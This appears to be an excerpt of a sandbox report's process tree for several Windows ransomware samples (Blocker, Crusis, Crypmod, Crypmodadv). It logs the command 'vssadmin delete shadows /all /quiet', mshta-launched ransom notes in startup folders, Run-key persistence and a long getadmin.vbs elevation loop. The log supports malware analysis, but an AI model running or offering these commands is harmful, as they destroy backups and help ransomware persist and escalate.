C:\Users\Admin\Desktop\00369\Trojan-Ransom.Win32.Blocker.ljyl-cfd34633ddda4e6dda707f48d589ebb3a226dd53d99a16b9734605e2fbf3d75e.exeTrojan-Ransom.Win32.Blocker.ljyl-cfd34633ddda4e6dda707f48d589ebb3a226dd53d99a16b9734605e2fbf3d75e.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5596 -
C:\Users\Admin\Desktop\00369\Trojan-Ransom.Win32.Blocker.ljyl-cfd34633ddda4e6dda707f48d589ebb3a226dd53d99a16b9734605e2fbf3d75e.exerojan-Ransom.Win32.Blocker.ljyl-cfd34633ddda4e6dda707f48d589ebb3a226dd53d99a16b9734605e2fbf3d75e.exe5⤵PID:7652
-
-
-
C:\Users\Admin\Desktop\00369\Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exeTrojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
PID:5616 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"5⤵PID:5748
-
C:\Windows\system32\mode.commode con cp select=12516⤵PID:6104
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:7020
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"5⤵PID:1732
-
C:\Windows\system32\mode.commode con cp select=12516⤵PID:7852
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:1660
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"5⤵PID:7056
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"5⤵PID:1144
-
-
-
C:\Users\Admin\Desktop\00369\Trojan-Ransom.Win32.Crypmod.aatd-7a9ebb7dbb01023d06aab08743dd3af2ffa4bf86aff6bbe487f4e7f5596fc230.exeTrojan-Ransom.Win32.Crypmod.aatd-7a9ebb7dbb01023d06aab08743dd3af2ffa4bf86aff6bbe487f4e7f5596fc230.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5628 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\Common Files\System\srv.exe" install5⤵PID:5116
-
C:\Program Files\Common Files\System\srv.exe"C:\Program Files\Common Files\System\srv.exe" install6⤵PID:8508
-
-
-
-
C:\Users\Admin\Desktop\00369\Trojan-Ransom.Win32.Crypmodadv.xrz-4f3db8eb6a92c35312e30f7fdcb9a963e2a8273efcf4e88cd4df01feefb8293c.exeTrojan-Ransom.Win32.Crypmodadv.xrz-4f3db8eb6a92c35312e30f7fdcb9a963e2a8273efcf4e88cd4df01feefb8293c.exe4⤵
- Executes dropped EXE
PID:7536 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0LU21SS9.bat" Trojan-Ransom.Win32.Crypmodadv.xrz-4f3db8eb6a92c35312e30f7fdcb9a963e2a8273efcf4e88cd4df01feefb8293c.exe "5⤵
- Checks computer location settings
PID:7564 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"6⤵PID:8948
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"6⤵PID:6560
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"7⤵
- Executes dropped EXE
PID:9596 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CEOSUPPH.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "8⤵PID:656
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"9⤵PID:808
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"9⤵
- Checks computer location settings
PID:9440 -
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"10⤵
- Executes dropped EXE
PID:7228 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C3BNGEMN.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "11⤵
- System Location Discovery: System Language Discovery
PID:9380 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"12⤵PID:6164
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"12⤵
- Checks computer location settings
PID:8880 -
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"13⤵
- Executes dropped EXE
PID:7656 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8OWF9X11.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "14⤵
- Modifies registry class
PID:2312 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"15⤵PID:3084
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"15⤵
- Checks computer location settings
PID:7984 -
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"16⤵
- Executes dropped EXE
PID:8608 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0LSHW6BE.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "17⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2528 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"18⤵PID:9036
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"18⤵
- Checks computer location settings
PID:7684 -
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"19⤵
- Executes dropped EXE
PID:1616 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0ITGKTDQ.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "20⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:6200 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"21⤵PID:9776
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"21⤵PID:632
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"22⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:9460 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4KY0J1TF.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "23⤵PID:8604
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"24⤵PID:3804
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"24⤵PID:8256
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"25⤵
- Executes dropped EXE
PID:7296 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\08R7P2VA.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "26⤵
- Modifies registry class
PID:8852 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"27⤵
- System Location Discovery: System Language Discovery
PID:5436
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"27⤵
- Checks computer location settings
PID:9096 -
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"28⤵
- Executes dropped EXE
PID:8344 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\812KVG1K.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "29⤵
- Modifies registry class
PID:7736 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"30⤵PID:8764
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"30⤵
- Checks computer location settings
PID:6828 -
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"31⤵
- Executes dropped EXE
PID:9652 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4S0S39ST.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "32⤵
- Checks computer location settings
- Modifies registry class
PID:7964 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"33⤵PID:9560
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"33⤵PID:8076
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"34⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7420 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CGHYRX7N.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "35⤵
- Checks computer location settings
PID:5044 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"36⤵
- System Location Discovery: System Language Discovery
PID:6140
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"36⤵
- Checks computer location settings
PID:9168 -
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"37⤵
- Executes dropped EXE
PID:4256 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0DQ5DX61.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "38⤵
- Modifies registry class
PID:6568 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"39⤵
- System Location Discovery: System Language Discovery
PID:2660
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"39⤵
- Checks computer location settings
PID:9132 -
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"40⤵
- Executes dropped EXE
PID:9532 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C97FB7WL.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "41⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3232 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"42⤵PID:7776
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"42⤵
- Checks computer location settings
PID:7608 -
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"43⤵
- Executes dropped EXE
PID:6400 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\01OU1SRJ.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "44⤵PID:8556
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"45⤵PID:3380
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"45⤵PID:9624
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"46⤵
- Executes dropped EXE
PID:7332 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4EA63WPR.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "47⤵
- Modifies registry class
PID:4652 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"48⤵PID:9808
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"48⤵
- Checks computer location settings
PID:9236 -
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"49⤵
- Executes dropped EXE
PID:9972 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4305IDLY.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "50⤵
- Checks computer location settings
- Modifies registry class
PID:7136 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"51⤵PID:10080
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"51⤵
- Checks computer location settings
PID:740 -
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"52⤵
- Executes dropped EXE
PID:7740 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CW87K3WR.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "53⤵
- Modifies registry class
PID:9728 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"54⤵PID:7324
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"54⤵
- Checks computer location settings
PID:1532 -
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"55⤵
- Executes dropped EXE
PID:8788 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4CRU325S.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "56⤵PID:9396
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"57⤵PID:2016
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"57⤵
- Checks computer location settings
PID:8668 -
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"58⤵
- Executes dropped EXE
PID:4996 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4PBSXEYR.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "59⤵
- Checks computer location settings
PID:8164 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"60⤵PID:8660
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"60⤵PID:9036
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"61⤵
- Executes dropped EXE
PID:5972 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4TGMPFFD.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "62⤵
- Checks computer location settings
- Modifies registry class
PID:10124 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"63⤵PID:2188
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"63⤵PID:4516
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"64⤵
- Executes dropped EXE
PID:7288 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\84SI9S5N.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "65⤵PID:6452
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"66⤵
- System Location Discovery: System Language Discovery
PID:6200
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"66⤵PID:5040
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"67⤵
- Executes dropped EXE
PID:8036 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4DK3RF5C.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "68⤵
- Checks computer location settings
PID:7752 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"69⤵PID:9144
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"69⤵
- System Location Discovery: System Language Discovery
PID:2380 -
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"70⤵
- Executes dropped EXE
PID:2904 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8SEPG5UL.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "71⤵PID:940
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"72⤵
- System Location Discovery: System Language Discovery
PID:5968
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"72⤵
- Checks computer location settings
PID:6084 -
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"73⤵
- Executes dropped EXE
PID:6048 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0OOITXJ0.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "74⤵PID:2580
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"75⤵PID:7096
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"75⤵PID:7072
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"76⤵
- Executes dropped EXE
PID:8120 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8MY5HOUO.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "77⤵PID:7268
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"78⤵
- System Location Discovery: System Language Discovery
PID:3748
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"78⤵PID:7816
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"79⤵
- Executes dropped EXE
PID:8076 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CCOIQ8GB.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "80⤵
- Checks computer location settings
- Modifies registry class
PID:5440 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"81⤵PID:3536
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"81⤵PID:4764
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"82⤵
- Executes dropped EXE
PID:8324 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4YOVO224.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "83⤵PID:7476
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"84⤵PID:1948
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"84⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5356 -
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"85⤵
- Executes dropped EXE
PID:8080 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0J0WL9WV.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "86⤵
- Modifies registry class
PID:5216 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"87⤵
- System Location Discovery: System Language Discovery
PID:6956
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"87⤵PID:7832
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"88⤵
- Executes dropped EXE
PID:5612 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C1NSFS2O.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "89⤵PID:720
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"90⤵PID:1688
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"90⤵
- System Location Discovery: System Language Discovery
PID:3516 -
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"91⤵PID:7556
-
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4Q0UIWU8.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "92⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2020 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"93⤵
- System Location Discovery: System Language Discovery
PID:5184
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"93⤵PID:2352
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"94⤵PID:6788
-
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4XLGI1XW.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "95⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:9876 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"96⤵PID:6300
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"96⤵PID:8700
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"97⤵PID:9304
-
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8CCARDAW.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "98⤵PID:6420
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"99⤵PID:6868
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"99⤵PID:7784
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"100⤵PID:1848
-
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8WU41729.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "101⤵
- Modifies registry class
PID:7276 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"102⤵PID:8224
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"102⤵PID:7332
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"103⤵PID:6460
-
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CP909DQG.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "104⤵
- Modifies registry class
PID:3948 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"105⤵PID:5364
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"105⤵PID:6856
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"106⤵PID:8796
-
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CXA4VBYT.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "107⤵
- Checks computer location settings
- Modifies registry class
PID:1816 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"108⤵PID:5492
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"108⤵PID:6728
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"109⤵
- System Location Discovery: System Language Discovery
PID:8380 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CGEJ1RDU.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "110⤵PID:6228
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"111⤵PID:4720
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"111⤵PID:5432
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"112⤵
- System Location Discovery: System Language Discovery
PID:2244 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\45GPV94T.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "113⤵
- Modifies registry class
PID:3416 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"114⤵
- System Location Discovery: System Language Discovery
PID:8352
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"114⤵
- Checks computer location settings
PID:7004 -
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"115⤵PID:8148
-
